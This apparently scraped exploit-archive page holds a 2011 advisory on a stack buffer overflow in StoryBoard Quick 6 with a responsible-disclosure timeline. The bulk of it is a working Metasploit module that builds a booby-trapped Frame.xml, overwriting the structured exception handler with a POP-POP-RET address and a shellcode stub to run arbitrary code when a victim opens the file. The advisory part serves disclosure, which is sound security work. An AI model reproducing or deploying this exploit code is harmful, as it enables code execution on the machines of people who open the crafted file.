扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 |
#NameLStoryBoard Quick 6 Stack Buffer Overflow #Vendor Website:http://www.powerproduction.com/ #Date Released:29/11/2011 #Affected Software: StoryBoard Quick 6 (potentially also StoryBoard Artist and StoryBoard Studio) #Researcher: Nick Freeman (nick.freeman@security-assessment.com) #Description #Security-Assessment.com has discovered a file format vulnerability in the XML files used to describe frames #in the StoryBoard Quick 6 software. The <string> element used to define a filename was found to be #vulnerable to a buffer overflow, which can be exploited to execute arbitrary code under the context of the #user running StoryBoard Quick 6. Supplying a long file name causes memory corruption within the application. #By crafting a file that contains more than 507 characters in the <string> field, the StoryBoard Quick 6 #application will use the next 4 characters in an unsafe manner. These four characters are used as a pointer #to the source address for a string copy function. It is possible to write user-supplied data onto the stack #by changing the value of these 4 characters to a memory location containing a pointer to data within the #Frame.xml file. This strcpy function overwrites a significant portion of the stack, including the Structured #Exception Handler. #Disclosure Timeline: #Security-Assessment.com practices responsible disclosure and made significant effort to report this #vulnerability to PowerProduction Software. #13/06/2011: First email sent to PowerProduction, asking for contact details for security or developer #personnel. #17/06/2011: After several attempts to get in contact, PowerProduction asks me for a customer number. #17/06/2011: Security-Assessment.com replies stating that this issue is exploitable without a customer number. #No response was received from PowerProduction after this email. #23/06/2011: Security-Assessment.com sends a follow-up email stating that the vulnerability is still present. #10/07/2011: A final email is sent stating that PowerProduction customers are vulnerable. #05/11/11: Vulnerability released at Kiwicon V in Wellington, New Zealand. #19/11/11: Vulnerability released at Ruxcon 2011 in Melbourne, Australia. #29/11/11: Vulnerability advisory and exploit code published. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'StoryBoard Quick 6 Memory Corruption Vulnerability', 'Description'=> %q{ This module exploits a stack-based buffer overflow in StoryBoard Quick 6. }, 'License'=> MSF_LICENSE, 'Author' => [ 'vt [nick.freeman@security-assessment.com]' ], 'Version'=> '$Revision: 10394 $', 'References' => [ [ 'URL', 'http://security-assessment.com/files/documents/advisory/StoryBoard_Quick_6-Stack_Buffer_Overflow.pdf' ] ], 'Payload'=> { 'Space'=> 1024, 'BadChars' => "\x00", 'DisableNops'=> true, 'EncoderType'=> Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' => { 'BufferRegister' => 'EAX', } }, 'Platform' => 'win', 'Targets'=> [ [ 'Default (WinXP SP3 No DEP)', { } ], ], 'Privileged' => false, 'DisclosureDate' => 'Nov 30 2011', 'DefaultTarget'=> 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.',"Frame-001.xml"]), ], self.class) end def exploit template = %Q|<plist version="1.0"> <dict> <key>ID</key> <integer>1</integer> <key>Objects</key> <array> <dict> <key>Size-X</key> <real>134.00000000</real> <key>Size-Y</key> <real>667.00000000</real> <key>Type</key> <string>cLIB</string> <key>Library</key> <string>C:\\Program Files\\StoryBoard Quick 6\\Libraries\\Characters\\Woman 1.artgrid</string> <key>ID</key> <string>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAREPLACE_1BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB.xo</string> <key>Colorization</key> <dict> <key>Arms</key> <string>ff4b70ff</string> <key>Eyes</key> <string>ff00ff00</string> <key>Hair</key> <string>ff68502d</string> <key>Face</key> <string>fffdd8a1</string> <key>REPLACE_2</key> <string>ff070707</string> <key>Skin</key> <string>ffd7b583</string> <key>Legs</key> <string>ff06007e</string> </dict> <key>Whom</key> <string>LINDA</string> <key>Scale-X</key> <real>0.74842578</real> <key>Scale-Y</key> <real>0.74842578</real> <key>Offset-Y</key> <real>41.60000610</real> </dict> <dict> <key>Size-X</key> <real>310.00000000</real> <key>Size-Y</key> <real>575.00000000</real> <key>Type</key> <string>cLIB</string> <key>Library</key> <string>C:\\Program Files\\StoryBoard Quick 6\\Libraries\\Characters\\Woman 2.artgrid</string> <key>ID</key> <string>30012.xo</string> <key>Colorization</key> <dict> <key>Arms</key> <string>ff909090</string> <key>Eyes</key> <string>ff00ff00</string> <key>Hair</key> <string>ff090909</string> <key>Face</key> <string>ffff0837</string> <key>Shoe</key> <string>ff1100c2</string> <key>Skin</key> <string>ffb78d4f</string> <key>Legs</key> <string>ff050505</string> </dict> <key>Whom</key> <string>C.J.</string> <key>Scale-X</key> <real>0.86817396</real> <key>Scale-Y</key> <real>0.86817396</real> <key>Offset-Y</key> <real>41.60000610</real> </dict> <dict> <key>IsSelected</key> REPLACE_3<true/> <key>Size-X</key> <real>682.00000000</real> <key>Size-Y</key> <real>565.00000000</real> <key>Type</key> <string>cLIB</string> <key>Library</key> <string>C:\\Program Files\\StoryBoard Quick 6\\Libraries\\Characters\\Woman 1.artgrid</string> <key>ID</key> <string>30013.xo</string> <key>Colorization</key> <dict> <key>Arms</key> <string>ff4b70ff</string> <key>Eyes</key> <string>ff00ff00</string> <key>Hair</key> <string>ff68502d</string> <key>Face</key> <string>fffdd8a1</string> <key>Shoe</key> <string>ff070707</string> <key>Skin</key> <string>ffd7b583</string> <key>Legs</key> <string>ff06007e</string> </dict> <key>Whom</key> <string>LINDA</string> <key>Scale-X</key> <real>0.95718473</real> <key>Scale-Y</key> <real>0.95718473</real> <key>Offset-Y</key> <real>62.40469360</real> </dict> </array> <key>FrameDB</key> <dict> <key>TXT-0006</key> <data> MDYvMDMvMTEgMjM6Mjg6MDMA </data> </dict> <key>UN-Thumb</key> <true/> </dict> </plist> | sploit = template.gsub(/REPLACE_1/, "\xd9\xcf\xe5\x74") padd = "\x43" * 4256 nseh = "\x90\xeb\x06\x90" seh= "\x25\x12\xd1\x72" # POP, POP, RETN nops = "\x90"*9 # set buffer register bufregstub ="\x8b\xc4" # mov eax, esp bufregstub += "\x33\xc9" # xor ecx bufregstub += "\x83\xc1\x7f" # add ecx, 7f bufregstub += "\x6b\xc9\x17" # imul ecx,17 bufregstub += "\x83\xc1\x7b"# add ecx,7b bufregstub += "\x03\xc1" # add eax,ecx # eax now points to buffer, ready to decode shellcode. sploit = sploit.gsub(/REPLACE_2/,padd + nseh + seh + nops + bufregstub + payload.encoded + ("\x44"*(11137-payload.encoded.length))) sploit = sploit.gsub(/REPLACE_3/, "\x45"*658) print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) end end |
体验盒子
